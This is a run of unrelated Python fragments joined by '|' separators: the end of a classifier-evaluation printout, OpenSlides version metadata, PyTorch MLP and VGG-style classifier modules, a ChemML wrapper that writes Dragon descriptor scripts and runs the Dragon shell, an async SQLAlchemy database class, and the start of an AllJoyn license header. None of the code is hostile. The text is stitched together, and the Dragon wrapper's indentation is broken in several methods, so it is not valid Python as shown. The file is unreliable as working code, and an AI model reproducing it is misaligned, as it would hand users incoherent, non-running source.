            flag = '---- error ---'
        print('For '+nameListTest[i].strip()+' '+'Actual: '+str(ytest[i])+
              ' Predicted: '+str(y_pred[i])+flag)
    print(str(nn)+' test set elements')
    print(str(errorCount)+' incorrectly classified')
|
# Package metadata consumed by the build/packaging tooling.
__author__ = 'OpenSlides Team <support@openslides.org>'
__description__ = 'Presentation and assembly system'
__version__ = '2.0.1-dev'
|
import torch
from torch import nn
from torch.nn import functional as F
class mlp_classifier(nn.Module):
    """Multi-layer perceptron classifier with optional BatchNorm and dropout.

    Each hidden block is Linear -> (BatchNorm1d) -> ReLU -> Dropout; a final
    Linear maps onto `num_classes` raw logits (no softmax applied).

    Parameters
    ----------
    in_dim : input feature dimension.
    hidden_dims : list of hidden-layer widths; None/empty means no hidden layers.
    bn : insert BatchNorm1d after each hidden Linear.
    drop_rate : dropout probability applied to the input and inside each block.
    num_classes : size of the output logit layer.
    """

    def __init__(self, in_dim, hidden_dims=None, bn=True, drop_rate=0.0, num_classes=2):
        super(mlp_classifier, self).__init__()
        self.drop_rate = drop_rate
        modules = []
        if hidden_dims is None:
            hidden_dims = []
        hidden_dims = [in_dim] + hidden_dims
        for layer_idx in range(len(hidden_dims) - 1):
            # Build one hidden block, inserting BatchNorm only when requested.
            # Kept as a nested nn.Sequential (one per block) so state_dict keys
            # stay identical to the previous bn/no-bn duplicated branches.
            layers = [nn.Linear(hidden_dims[layer_idx], hidden_dims[layer_idx + 1])]
            if bn:
                layers.append(nn.BatchNorm1d(hidden_dims[layer_idx + 1]))
            layers.extend([nn.ReLU(), nn.Dropout(drop_rate)])
            modules.append(nn.Sequential(*layers))
        self.features = None if len(modules) == 0 else nn.Sequential(*modules)
        self.logits = nn.Linear(hidden_dims[-1], num_classes)

    def forward(self, input):
        # Apply input dropout, the optional hidden stack, then the logit layer.
        features = F.dropout(input, p=self.drop_rate, training=self.training)
        if self.features is not None:
            features = self.features(features)
        return self.logits(features)
class binary_classifier(nn.Module):
    """MLP for binary classification, ending in a single sigmoid probability.

    Each hidden block is Linear -> (BatchNorm1d) -> ReLU -> Dropout; the output
    is sigmoid(Linear(..., 1)), i.e. a value in [0, 1] per sample.

    Parameters
    ----------
    in_dim : input feature dimension.
    hidden_dims : list of hidden-layer widths; None/empty means no hidden layers.
    bn : insert BatchNorm1d after each hidden Linear.
    drop_rate : dropout probability applied to the input and inside each block.
    """

    def __init__(self, in_dim, hidden_dims=None, bn=True, drop_rate=0.0):
        super(binary_classifier, self).__init__()
        self.drop_rate = drop_rate
        modules = []
        if hidden_dims is None:
            hidden_dims = []
        hidden_dims = [in_dim] + hidden_dims
        for layer_idx in range(len(hidden_dims) - 1):
            # Build one hidden block, inserting BatchNorm only when requested.
            # Kept as a nested nn.Sequential (one per block) so state_dict keys
            # stay identical to the previous bn/no-bn duplicated branches.
            layers = [nn.Linear(hidden_dims[layer_idx], hidden_dims[layer_idx + 1])]
            if bn:
                layers.append(nn.BatchNorm1d(hidden_dims[layer_idx + 1]))
            layers.extend([nn.ReLU(), nn.Dropout(drop_rate)])
            modules.append(nn.Sequential(*layers))
        self.features = None if len(modules) == 0 else nn.Sequential(*modules)
        self.logit = nn.Linear(hidden_dims[-1], 1)
        self.sigmoid = nn.Sigmoid()

    def forward(self, input):
        # Apply input dropout, the optional hidden stack, then sigmoid(logit).
        features = F.dropout(input, p=self.drop_rate, training=self.training)
        if self.features is not None:
            features = self.features(features)
        return self.sigmoid(self.logit(features))
class vgg_classifier(nn.Module):
    """VGG-style tail: three conv stages (with BatchNorm) plus a VGG FC head.

    Takes a 128-channel feature map as input. NOTE(review): the first FC layer
    is nn.Linear(512 * 1, ...), so after the three stride-2 max-pools the conv
    output must flatten to exactly 512 values -- i.e. the input feature map is
    presumably 8x8 spatially; confirm against the callers.
    """

    def __init__(self, num_classes=2):
        super(vgg_classifier, self).__init__()
        # Layout mirrors VGG16 stages 3-5 (three 3x3 convs + pool per stage);
        # kept as one flat nn.Sequential so checkpoint state_dict keys match.
        self.convnet = nn.Sequential(
            # Stage: 128 -> 256 channels.
            nn.Conv2d(128, 256, kernel_size=3, padding=1),
            nn.BatchNorm2d(256),
            nn.ReLU(inplace=True),
            nn.Conv2d(256, 256, kernel_size=3, padding=1),
            nn.BatchNorm2d(256),
            nn.ReLU(inplace=True),
            nn.Conv2d(256, 256, kernel_size=3, padding=1),
            nn.BatchNorm2d(256),
            nn.ReLU(inplace=True),
            nn.MaxPool2d(kernel_size=2, stride=2),
            # Stage: 256 -> 512 channels.
            nn.Conv2d(256, 512, kernel_size=3, padding=1),
            nn.BatchNorm2d(512),
            nn.ReLU(inplace=True),
            nn.Conv2d(512, 512, kernel_size=3, padding=1),
            nn.BatchNorm2d(512),
            nn.ReLU(inplace=True),
            nn.Conv2d(512, 512, kernel_size=3, padding=1),
            nn.BatchNorm2d(512),
            nn.ReLU(inplace=True),
            nn.MaxPool2d(kernel_size=2, stride=2),
            # Stage: 512 -> 512 channels.
            nn.Conv2d(512, 512, kernel_size=3, padding=1),
            nn.BatchNorm2d(512),
            nn.ReLU(inplace=True),
            nn.Conv2d(512, 512, kernel_size=3, padding=1),
            nn.BatchNorm2d(512),
            nn.ReLU(inplace=True),
            nn.Conv2d(512, 512, kernel_size=3, padding=1),
            nn.BatchNorm2d(512),
            nn.ReLU(inplace=True),
            nn.MaxPool2d(kernel_size=2, stride=2),
        )
        # Classic VGG fully-connected head with dropout.
        self.fcnet = nn.Sequential(
            nn.Linear(512 * 1, 4096),
            nn.ReLU(inplace=True),
            nn.Dropout(),
            nn.Linear(4096, 4096),
            nn.ReLU(inplace=True),
            nn.Dropout(),
            nn.Linear(4096, num_classes),
        )

    def forward(self, x):
        # Convolutional features, flattened per-sample, then the FC head.
        out = self.convnet(x)
        out = out.view(out.size(0), -1)
        out = self.fcnet(out)
        return out
|
"""
Created on 01 March 2016
@author: Mojtaba Haghighatlari
"""
from __future__ import print_function
from builtins import range
import warnings
import os
import time
import pandas as pd
from lxml import objectify, etree
from chemml.utils import std_datetime_str
from chemml.utils import bool_formatter
from chemml.utils import tot_exec_time_str
class Dragon(object):
"""
An interface to the Dragon 6 and 7 chemoinformatics software. Dragon is commercial software and
you should provide a valid license/installation of it on your system.
Parameters
----------
version: int, optional (default=7)
The version of available Dragon on the user's system. (available versions: 6 or 7)
Weights: list, optional (default=["Mass","VdWVolume","Electronegativity","Polarizability","Ionization","I-State"])
A list of weights to be used
blocks: list, optional (default = list(range(1,31)))
A list of integers as descriptor blocks' id. There are totally 29 and 30 blocks available in
version 6 and 7, respectively.
This module is not aimed to cherry-pick descriptors in each block.
For doing so, please use the Script Wizard in the Dragon GUI.
external: boolean, optional (default=False)
If True, include external variables at the end of each saved file.
Notes
-----
The documentation for the rest of parameters can be found in the following links:
- http://www.talete.mi.it/help/dragon_help/index.html
- https://chm.kode-solutions.net/products_dragon_tutorial.php
In the current version, we recommend the user to use this class with the following parameters:
molInput = 'file'
molfile = path to one SMILES representation file with .smi format or a dictionary of many filepaths
script = 'new'
Examples
--------
>>> import pandas as pd
>>> from chemml.chem import Dragon
>>> drg = Dragon()
>>> drg.script_wizard(script='new', output_directory='./')
>>> drg.run()
>>> df = drg.convert_to_csv(remove=True)
>>> df = df.drop(['No.','NAME'], axis=1)
"""
def __init__(self,
version=7,
molFile='required_required',
molInput="file",
CheckUpdates=True,
SaveLayout=True,
PreserveTemporaryProjects=True,
ShowWorksheet=False,
Decimal_Separator=".",
Missing_String="NaN",
DefaultMolFormat="1",
HelpBrowser="/usr/bin/xdg-open",
RejectUnusualValence=False,
Add2DHydrogens=False,
MaxSRforAllCircuit="19",
MaxSR="35",
MaxSRDetour="30",
MaxAtomWalkPath="2000",
LogPathWalk=True,
LogEdge=True,
Weights=("Mass", "VdWVolume", "Electronegativity", "Polarizability", "Ionization",
"I-State"),
SaveOnlyData=False,
SaveLabelsOnSeparateFile=False,
SaveFormatBlock="%b-%n.txt",
SaveFormatSubBlock="%b-%s-%n-%m.txt",
SaveExcludeMisVal=False,
SaveExcludeAllMisVal=False,
SaveExcludeConst=False,
SaveExcludeNearConst=False,
SaveExcludeStdDev=False,
SaveStdDevThreshold="0.0001",
SaveExcludeCorrelated=False,
SaveCorrThreshold="0.95",
SaveExclusionOptionsToVariables=False,
SaveExcludeMisMolecules=False,
SaveExcludeRejectedMolecules=False,
blocks=list(range(1, 31)),
molInputFormat="SMILES",
SaveStdOut=False,
SaveProject=False,
SaveProjectFile="Dragon_project.drp",
SaveFile=True,
SaveType="singlefile",
SaveFilePath="Dragon_descriptors.txt",
logMode="file",
logFile="Dragon_log.txt",
external=False,
fileName=None,
delimiter=",",
consecutiveDelimiter=False,
MissingValue="NaN",
RejectDisconnectedStrucuture=False,
RetainBiggestFragment=False,
DisconnectedCalculationOption="0",
RoundCoordinates=True,
RoundWeights=True,
RoundDescriptorValues=True,
knimemode=False):
if version in (6, 7):
self.version = version
else:
msg = "Only version 6 and 7 are available through this module."
raise ValueError(msg)
self.molFile = molFile
self.molInput = molInput
self.CheckUpdates = CheckUpdates
self.PreserveTemporaryProjects = PreserveTemporaryProjects
self.SaveLayout = SaveLayout
self.ShowWorksheet = ShowWorksheet
self.Decimal_Separator = Decimal_Separator
self.Missing_String = Missing_String
self.DefaultMolFormat = DefaultMolFormat
self.HelpBrowser = HelpBrowser
self.RejectUnusualValence = RejectUnusualValence
self.Add2DHydrogens = Add2DHydrogens
self.MaxSRforAllCircuit = MaxSRforAllCircuit
self.MaxSR = MaxSR
self.MaxSRDetour = MaxSRDetour
self.MaxAtomWalkPath = MaxAtomWalkPath
self.LogPathWalk = LogPathWalk
self.LogEdge = LogEdge
self.Weights = Weights
self.SaveOnlyData = SaveOnlyData
self.SaveLabelsOnSeparateFile = SaveLabelsOnSeparateFile
self.SaveFormatBlock = SaveFormatBlock
self.SaveFormatSubBlock = SaveFormatSubBlock
self.SaveExcludeMisVal = SaveExcludeMisVal
self.SaveExcludeAllMisVal = SaveExcludeAllMisVal
self.SaveExcludeConst = SaveExcludeConst
self.SaveExcludeNearConst = SaveExcludeNearConst
self.SaveExcludeStdDev = SaveExcludeStdDev
self.SaveStdDevThreshold = SaveStdDevThreshold
self.SaveExcludeCorrelated = SaveExcludeCorrelated
self.SaveCorrThreshold = SaveCorrThreshold
self.SaveExclusionOptionsToVariables = SaveExclusionOptionsToVariables
self.SaveExcludeMisMolecules = SaveExcludeMisMolecules
self.SaveExcludeRejectedMolecules = SaveExcludeRejectedMolecules
self.blocks = blocks
self.molInputFormat = molInputFormat
self.SaveStdOut = SaveStdOut
self.SaveProject = SaveProject
self.SaveProjectFile = SaveProjectFile
self.SaveFile = SaveFile
self.SaveType = SaveType
self.SaveFilePath = SaveFilePath
self.logMode = logMode
self.logFile = logFile
self.external = external
self.fileName = fileName
self.delimiter = delimiter
self.consecutiveDelimiter = consecutiveDelimiter
self.MissingValue = MissingValue
self.RejectDisconnectedStrucuture = RejectDisconnectedStrucuture
self.RetainBiggestFragment = RetainBiggestFragment
self.DisconnectedCalculationOption = DisconnectedCalculationOption
self.RoundCoordinates = RoundCoordinates
self.RoundWeights = RoundWeights
self.RoundDescriptorValues = RoundDescriptorValues
self.knimemode = knimemode
    def script_wizard(self, script='new', output_directory='./'):
        """
        The script_wizard is designed to build a Dragon script file. The name and
        the functionality of this function is the same as available Script wizard
        in the Dragon Graphic User Interface.
        Note: All reported nodes are mandatory, except the <EXTERNAL> tag
        Note: Script for version 7 doesn't support fingerprints block
        Parameters
        ----------
        script: string, optional (default="new")
            If "new" start creating a new script from scratch. If you want to load an existing script,
            pass the filename with drs format.
        output_directory: string, optional (default = './')
            the path to the working directory to store output files.
        dragon: xml element
            Dragon script in xml format.
        drs: string
            Dragon script file name
        data_path: string
            The path+name of saved data file in any format. If saveType is 'block'
            or 'subblock' data_path is just the path to the directory that all data
            files have been saved.
        Returns
        -------
        class parameters
        """
        self.output_directory = output_directory
        if not os.path.exists(self.output_directory):
            os.makedirs(self.output_directory)
        if script == 'new':
            # The v6 and v7 branches build structurally similar XML trees; the
            # element order is preserved exactly as Dragon expects it.
            if self.version == 6:
                self.dragon = objectify.Element(
                    "DRAGON",
                    version="%i.0.0" % self.version,
                    script_version="1",
                    generation_date=std_datetime_str('date').replace('-', '/'))
                # --- OPTIONS node: global calculation / saving switches ---
                OPTIONS = objectify.SubElement(self.dragon, "OPTIONS")
                OPTIONS.append(
                    objectify.Element("CheckUpdates", value=bool_formatter(self.CheckUpdates)))
                OPTIONS.append(objectify.Element("SaveLayout", value=bool_formatter(self.SaveLayout)))
                OPTIONS.append(
                    objectify.Element("ShowWorksheet", value=bool_formatter(self.ShowWorksheet)))
                OPTIONS.append(objectify.Element("Decimal_Separator", value=self.Decimal_Separator))
                OPTIONS.append(objectify.Element("Missing_String", value=self.Missing_String))
                OPTIONS.append(objectify.Element("DefaultMolFormat", value=self.DefaultMolFormat))
                OPTIONS.append(objectify.Element("HelpBrowser", value=self.HelpBrowser))
                OPTIONS.append(
                    objectify.Element(
                        "RejectUnusualValence", value=bool_formatter(self.RejectUnusualValence)))
                OPTIONS.append(
                    objectify.Element("Add2DHydrogens", value=bool_formatter(self.Add2DHydrogens)))
                OPTIONS.append(objectify.Element("MaxSRforAllCircuit", value=self.MaxSRforAllCircuit))
                OPTIONS.append(objectify.Element("MaxSR", value=self.MaxSR))
                OPTIONS.append(objectify.Element("MaxSRDetour", value=self.MaxSRDetour))
                OPTIONS.append(objectify.Element("MaxAtomWalkPath", value=self.MaxAtomWalkPath))
                OPTIONS.append(objectify.Element("LogPathWalk", value=bool_formatter(self.LogPathWalk)))
                OPTIONS.append(objectify.Element("LogEdge", value=bool_formatter(self.LogEdge)))
                # Atomic weighting schemes must come from Dragon's fixed set.
                Weights = objectify.SubElement(OPTIONS, "Weights")
                for weight in self.Weights:
                    if weight not in [
                            "Mass", "VdWVolume", "Electronegativity", "Polarizability", "Ionization",
                            "I-State"
                    ]:
                        msg = "'%s' is not a valid weight type." % weight
                        raise ValueError(msg)
                    Weights.append(objectify.Element('weight', name=weight))
                OPTIONS.append(
                    objectify.Element("SaveOnlyData", value=bool_formatter(self.SaveOnlyData)))
                OPTIONS.append(
                    objectify.Element(
                        "SaveLabelsOnSeparateFile", value=bool_formatter(self.SaveLabelsOnSeparateFile)))
                OPTIONS.append(objectify.Element("SaveFormatBlock", value=self.SaveFormatBlock))
                OPTIONS.append(objectify.Element("SaveFormatSubBlock", value=self.SaveFormatSubBlock))
                OPTIONS.append(
                    objectify.Element("SaveExcludeMisVal", value=bool_formatter(self.SaveExcludeMisVal)))
                OPTIONS.append(
                    objectify.Element(
                        "SaveExcludeAllMisVal", value=bool_formatter(self.SaveExcludeAllMisVal)))
                OPTIONS.append(
                    objectify.Element("SaveExcludeConst", value=bool_formatter(self.SaveExcludeConst)))
                OPTIONS.append(
                    objectify.Element(
                        "SaveExcludeNearConst", value=bool_formatter(self.SaveExcludeNearConst)))
                OPTIONS.append(
                    objectify.Element("SaveExcludeStdDev", value=bool_formatter(self.SaveExcludeStdDev)))
                OPTIONS.append(objectify.Element("SaveStdDevThreshold", value=self.SaveStdDevThreshold))
                OPTIONS.append(
                    objectify.Element(
                        "SaveExcludeCorrelated", value=bool_formatter(self.SaveExcludeCorrelated)))
                OPTIONS.append(objectify.Element("SaveCorrThreshold", value=self.SaveCorrThreshold))
                OPTIONS.append(
                    objectify.Element(
                        "SaveExclusionOptionsToVariables",
                        value=bool_formatter(self.SaveExclusionOptionsToVariables)))
                OPTIONS.append(
                    objectify.Element(
                        "SaveExcludeMisMolecules", value=bool_formatter(self.SaveExcludeMisMolecules)))
                OPTIONS.append(
                    objectify.Element(
                        "SaveExcludeRejectedMolecules",
                        value=bool_formatter(self.SaveExcludeRejectedMolecules)))
                # --- DESCRIPTORS node: Dragon 6 supports block ids 1..29 ---
                DESCRIPTORS = objectify.SubElement(self.dragon, "DESCRIPTORS")
                for i in self.blocks:
                    if i < 1 or i > 29:
                        msg = "block id must be in range 1 to 29."
                        raise ValueError(msg)
                    DESCRIPTORS.append(objectify.Element('block', id="%i" % i, SelectAll="true"))
                # --- MOLFILES node: input molecules (only 'file' input is supported) ---
                MOLFILES = objectify.SubElement(self.dragon, "MOLFILES")
                MOLFILES.append(objectify.Element("molInput", value=self.molInput))
                # if self.molInput == "stdin":
                # if self.molInputFormat not in ['SYBYL', 'MDL', 'HYPERCHEM', 'SMILES', 'MACROMODEL']:
                # msg = "'%s' is not a valid molInputFormat. Formats:['SYBYL','MDL','HYPERCHEM','SMILES','MACROMODEL']" % self.molInputFormat
                # raise ValueError(msg)
                # MOLFILES.append(objectify.Element("molInputFormat", value=self.molInputFormat))
                if self.molInput == "file":
                    if isinstance(self.molFile, dict):
                        # dict form: {1: {'file': path}, 2: {'file': path}, ...} keyed from 1
                        for f in range(1, len(self.molFile) + 1):
                            MOLFILES.append(objectify.Element("molFile", value=self.molFile[f]['file']))
                    elif isinstance(self.molFile, str):
                        MOLFILES.append(objectify.Element("molFile", value=self.molFile))
                    else:
                        # NOTE(review): message says 'molInput' but the check is on
                        # molFile (the v7 branch says 'molFile') -- likely a typo.
                        msg = 'Variable molInput can be either a string or a list'
                        raise ValueError(msg)
                else:
                    msg = "The molInput value must be 'file'. 'stdin' is not supported through ChemML"
                    raise ValueError(msg)
                # --- OUTPUT node: where and how results are written ---
                OUTPUT = objectify.SubElement(self.dragon, "OUTPUT")
                OUTPUT.append(objectify.Element("SaveStdOut", value=bool_formatter(self.SaveStdOut)))
                OUTPUT.append(objectify.Element("SaveProject", value=bool_formatter(self.SaveProject)))
                if self.SaveProject:
                    OUTPUT.append(objectify.Element("SaveProjectFile", value=self.SaveProjectFile))
                OUTPUT.append(objectify.Element("SaveFile", value=bool_formatter(self.SaveFile)))
                if self.SaveFile:
                    OUTPUT.append(objectify.Element(
                        "SaveType", value=self.SaveType))  # value = "[singlefile/block/subblock]"
                    OUTPUT.append(
                        objectify.Element(
                            "SaveFilePath", value=self.output_directory + self.SaveFilePath)
                    )  #Specifies the file name for saving results as a plan text file(s), if the "singlefile" option is set; if "block" or "subblock" are set, specifies the path in which results files will be saved.
                OUTPUT.append(objectify.Element("logMode",
                                                value=self.logMode))  # value = [none/stderr/file]
                if self.logMode == "file":
                    OUTPUT.append(
                        objectify.Element("logFile", value=self.output_directory + self.logFile))
                # --- optional EXTERNAL node: user-supplied descriptor file ---
                if self.external:
                    EXTERNAL = objectify.SubElement(self.dragon, "EXTERNAL")
                    EXTERNAL.append(objectify.Element("fileName", value=self.fileName))
                    EXTERNAL.append(objectify.Element("delimiter", value=self.delimiter))
                    EXTERNAL.append(
                        objectify.Element(
                            "consecutiveDelimiter", value=bool_formatter(self.consecutiveDelimiter)))
                    EXTERNAL.append(objectify.Element("MissingValue", value=self.MissingValue))
                self._save_script()
            elif self.version == 7:
                self.dragon = objectify.Element(
                    "DRAGON",
                    version="%i.0.0" % self.version,
                    description="Dragon7 - FP1 - MD5270",
                    script_version="1",
                    generation_date=std_datetime_str('date').replace('-', '/'))
                OPTIONS = objectify.SubElement(self.dragon, "OPTIONS")
                OPTIONS.append(
                    objectify.Element("CheckUpdates", value=bool_formatter(self.CheckUpdates)))
                OPTIONS.append(
                    objectify.Element(
                        "PreserveTemporaryProjects",
                        value=bool_formatter(self.PreserveTemporaryProjects)))
                OPTIONS.append(objectify.Element("SaveLayout", value=bool_formatter(self.SaveLayout)))
                # OPTIONS.append(objectify.Element("ShowWorksheet", value = bool_formatter(self.ShowWorksheet)))
                OPTIONS.append(objectify.Element("Decimal_Separator", value=self.Decimal_Separator))
                # Dragon 7 spells the missing-value marker "na" instead of "NaN".
                if self.Missing_String == "NaN": self.Missing_String = "na"
                OPTIONS.append(objectify.Element("Missing_String", value=self.Missing_String))
                OPTIONS.append(objectify.Element("DefaultMolFormat", value=self.DefaultMolFormat))
                # OPTIONS.append(objectify.Element("HelpBrowser", value = self.HelpBrowser))
                OPTIONS.append(
                    objectify.Element(
                        "RejectDisconnectedStrucuture",
                        value=bool_formatter(self.RejectDisconnectedStrucuture)))
                OPTIONS.append(
                    objectify.Element(
                        "RetainBiggestFragment", value=bool_formatter(self.RetainBiggestFragment)))
                OPTIONS.append(
                    objectify.Element(
                        "RejectUnusualValence", value=bool_formatter(self.RejectUnusualValence)))
                OPTIONS.append(
                    objectify.Element("Add2DHydrogens", value=bool_formatter(self.Add2DHydrogens)))
                OPTIONS.append(
                    objectify.Element(
                        "DisconnectedCalculationOption", value=self.DisconnectedCalculationOption))
                OPTIONS.append(objectify.Element("MaxSRforAllCircuit", value=self.MaxSRforAllCircuit))
                # OPTIONS.appendm(objectify.Element("MaxSR", value = self.MaxSR))
                OPTIONS.append(objectify.Element("MaxSRDetour", value=self.MaxSRDetour))
                OPTIONS.append(objectify.Element("MaxAtomWalkPath", value=self.MaxAtomWalkPath))
                OPTIONS.append(
                    objectify.Element("RoundCoordinates", value=bool_formatter(self.RoundCoordinates)))
                OPTIONS.append(
                    objectify.Element("RoundWeights", value=bool_formatter(self.RoundWeights)))
                OPTIONS.append(objectify.Element("LogPathWalk", value=bool_formatter(self.LogPathWalk)))
                OPTIONS.append(objectify.Element("LogEdge", value=bool_formatter(self.LogEdge)))
                Weights = objectify.SubElement(OPTIONS, "Weights")
                for weight in self.Weights:
                    if weight not in [
                            "Mass", "VdWVolume", "Electronegativity", "Polarizability", "Ionization",
                            "I-State"
                    ]:
                        msg = "'%s' is not a valid weight type." % weight
                        raise ValueError(msg)
                    Weights.append(objectify.Element('weight', name=weight))
                OPTIONS.append(
                    objectify.Element("SaveOnlyData", value=bool_formatter(self.SaveOnlyData)))
                OPTIONS.append(
                    objectify.Element(
                        "SaveLabelsOnSeparateFile", value=bool_formatter(self.SaveLabelsOnSeparateFile)))
                OPTIONS.append(objectify.Element("SaveFormatBlock", value=self.SaveFormatBlock))
                OPTIONS.append(objectify.Element("SaveFormatSubBlock", value=self.SaveFormatSubBlock))
                OPTIONS.append(
                    objectify.Element("SaveExcludeMisVal", value=bool_formatter(self.SaveExcludeMisVal)))
                OPTIONS.append(
                    objectify.Element(
                        "SaveExcludeAllMisVal", value=bool_formatter(self.SaveExcludeAllMisVal)))
                OPTIONS.append(
                    objectify.Element("SaveExcludeConst", value=bool_formatter(self.SaveExcludeConst)))
                OPTIONS.append(
                    objectify.Element(
                        "SaveExcludeNearConst", value=bool_formatter(self.SaveExcludeNearConst)))
                OPTIONS.append(
                    objectify.Element("SaveExcludeStdDev", value=bool_formatter(self.SaveExcludeStdDev)))
                OPTIONS.append(objectify.Element("SaveStdDevThreshold", value=self.SaveStdDevThreshold))
                OPTIONS.append(
                    objectify.Element(
                        "SaveExcludeCorrelated", value=bool_formatter(self.SaveExcludeCorrelated)))
                OPTIONS.append(objectify.Element("SaveCorrThreshold", value=self.SaveCorrThreshold))
                OPTIONS.append(
                    objectify.Element(
                        "SaveExclusionOptionsToVariables",
                        value=bool_formatter(self.SaveExclusionOptionsToVariables)))
                OPTIONS.append(
                    objectify.Element(
                        "SaveExcludeMisMolecules", value=bool_formatter(self.SaveExcludeMisMolecules)))
                OPTIONS.append(
                    objectify.Element(
                        "SaveExcludeRejectedMolecules",
                        value=bool_formatter(self.SaveExcludeRejectedMolecules)))
                OPTIONS.append(
                    objectify.Element(
                        "RoundDescriptorValues", value=bool_formatter(self.RoundDescriptorValues)))
                # Dragon 7 supports one extra descriptor block (1..30).
                DESCRIPTORS = objectify.SubElement(self.dragon, "DESCRIPTORS")
                for i in self.blocks:
                    if i < 1 or i > 30:
                        msg = "block id must be in range 1 to 30."
                        raise ValueError(msg)
                    DESCRIPTORS.append(objectify.Element('block', id="%i" % i, SelectAll="true"))
                MOLFILES = objectify.SubElement(self.dragon, "MOLFILES")
                MOLFILES.append(objectify.Element("molInput", value=self.molInput))
                # if self.molInput == "stdin":
                # if self.molInputFormat not in [
                # 'SYBYL', 'MDL', 'HYPERCHEM', 'SMILES', 'CML', 'MACROMODEL'
                # ]:
                # msg = "'%s' is not a valid molInputFormat. Formats:['SYBYL','MDL','HYPERCHEM','SMILES','CML','MACROMODEL']" % self.molInputFormat
                # raise ValueError(msg)
                # MOLFILES.append(objectify.Element("molInputFormat", value=self.molInputFormat))
                if self.molInput == "file":
                    if isinstance(self.molFile, dict):
                        for f in range(1, len(self.molFile) + 1):
                            MOLFILES.append(objectify.Element("molFile", value=self.molFile[f]['file']))
                    elif isinstance(self.molFile, str):
                        MOLFILES.append(objectify.Element("molFile", value=self.molFile))
                    else:
                        msg = 'Variable molFile can be either a string or a list'
                        raise ValueError(msg)
                else:
                    msg = "The molInput value must be 'file'. 'stdin' is not supported through ChemML"
                    raise ValueError(msg)
                OUTPUT = objectify.SubElement(self.dragon, "OUTPUT")
                OUTPUT.append(objectify.Element("knimemode", value=bool_formatter(self.knimemode)))
                OUTPUT.append(objectify.Element("SaveStdOut", value=bool_formatter(self.SaveStdOut)))
                OUTPUT.append(objectify.Element("SaveProject", value=bool_formatter(self.SaveProject)))
                if self.SaveProject:
                    OUTPUT.append(objectify.Element("SaveProjectFile", value=self.SaveProjectFile))
                OUTPUT.append(objectify.Element("SaveFile", value=bool_formatter(self.SaveFile)))
                if self.SaveFile:
                    OUTPUT.append(objectify.Element(
                        "SaveType", value=self.SaveType))  # value = "[singlefile/block/subblock]"
                    OUTPUT.append(
                        objectify.Element(
                            "SaveFilePath", value=self.output_directory + self.SaveFilePath)
                    )  #Specifies the file name for saving results as a plan text file(s), if the "singlefile" option is set; if "block" or "subblock" are set, specifies the path in which results files will be saved.
                OUTPUT.append(objectify.Element("logMode",
                                                value=self.logMode))  # value = [none/stderr/file]
                if self.logMode == "file":
                    OUTPUT.append(
                        objectify.Element("logFile", value=self.output_directory + self.logFile))
                if self.external:
                    EXTERNAL = objectify.SubElement(self.dragon, "EXTERNAL")
                    EXTERNAL.append(objectify.Element("fileName", value=self.fileName))
                    EXTERNAL.append(objectify.Element("delimiter", value=self.delimiter))
                    EXTERNAL.append(
                        objectify.Element(
                            "consecutiveDelimiter", value=bool_formatter(self.consecutiveDelimiter)))
                    EXTERNAL.append(objectify.Element("MissingValue", value=self.MissingValue))
                self._save_script()
        else:
            # Load an existing .drs script instead of building one.
            doc = etree.parse(script)
            self.dragon = etree.tostring(doc)  # dragon script : dragon
            self.dragon = objectify.fromstring(self.dragon)
            objectify.deannotate(self.dragon)
            etree.cleanup_namespaces(self.dragon)
            if self.dragon.attrib['version'][0] not in ['6', '7']:
                msg = "Dragon script is not labeled to the newest vesions of Dragon, 6 or 7. This may causes some problems."
                warnings.warn(msg, RuntimeWarning)
            # Every loaded script must provide these four top-level nodes.
            mandatory_nodes = ['OPTIONS', 'DESCRIPTORS', 'MOLFILES', 'OUTPUT']
            reported_nodes = [element.tag for element in self.dragon.iterchildren()]
            if not set(reported_nodes).issuperset(set(mandatory_nodes)):
                msg = "Dragon script doesn't contain all required nodes, which are:%s" % str(
                    mandatory_nodes)
                raise ValueError(msg)
            self.drs = script
            self.data_path = self.dragon.OUTPUT.SaveFilePath.attrib['value']
        return self
def _save_script(self):
# objectify.deannotate(self.dragon)
etree.cleanup_namespaces(self.dragon)
self.drs_name = 'Dragon_script.drs'
with open(os.path.join(self.output_directory, self.drs_name), 'w') as outfile:
outfile.write(etree.tostring(self.dragon, pretty_print=True).decode())
def printout(self):
objectify.deannotate(self.dragon)
etree.cleanup_namespaces(self.dragon)
print(objectify.dump(self.dragon))
def run(self):
t0 = time.time()
print("running Dragon%i ..." % self.version)
os_ret = os.system('nohup dragon%sshell -s %s' %
(self.version, os.path.join(self.output_directory, self.drs_name)))
if os_ret != 0:
msg = "Oops, dragon%ishell command didn't work! Are you sure Dragon%i software is installed on your machine?" % (
self.version, self.version)
raise ImportError(msg)
# execution time
tmp_str = tot_exec_time_str(t0)
print("... Dragon job completed in %s"%tmp_str)
# print subprocess.check_output(['nohup dragon%sshell -s %s'%(self.version,self.drs)])
def convert_to_csv(self, remove=True):
"""
This function converts the tab-delimited txt file from Dragon to pandas dataframe.
Note that this process might require large memory based on the number of data points and features.
Parameters
----------
remove: bool, optional (default = True)
if True, the original descriptors file (Dragon_descriptors.txt) will be removed.
Returns
-------
pandas.DataFrame
The 2D dataframe of the descriptors. Note that the first two columns are 'No.' and 'NAME'.
"""
# convert to csv file
t0 = time.time()
print("converting output file to csv format ...")
df = pd.read_csv(self.data_path, sep=None, engine='python')
# df = df.drop(['No.', 'NAME'], axis=1)
# execution time
tmp_str = tot_exec_time_str(t0)
# remove original tab delimited file
if remove:
os.remove(self.data_path)
self.data_path = None
print("... conversion completed in %s"%tmp_str)
return df
|
from sqlalchemy.ext.asyncio import create_async_engine
from ..utils.config import Config
from ..utils.singleton import Singleton
class Database(Singleton):
    """Async database accessor; inherits Singleton (presumably one shared
    instance per process -- confirm against utils.singleton)."""

    def __init__(self):
        # echo=True logs every emitted SQL statement; pool_pre_ping revalidates
        # pooled connections before use so stale ones are replaced transparently.
        self.engine = create_async_engine(Config.url, echo=True, future=True, pool_pre_ping=True)

    async def execute(self, sql):
        """Execute a single statement inside a transaction and return its result.

        engine.begin() commits on success and rolls back if the statement raises.
        """
        async with self.engine.begin() as conn:
            result = await conn.execute(sql)
            return result
|
#!/usr/bin/python
# Copyright (c) Open Connectivity Foundation (OCF), AllJoyn Open Source
# Project (AJOSP) Contributors and others.
#
# SPDX-License-Identifier: Apache-2.0
#
# All rights reserved. This program and the accompanying materials are
# made available under the terms of the Apache License, Version 2.0
# which accompanies this distribution, and is available at
# http://www.apache.org/licenses/LICENSE-2.0
#
# Copyright (c) Open Connectivity Foundation and Contributors to AllSeen
# Alliance. All rights reserved.
#
# Permission to use, copy, modify, and/or distribute this software for
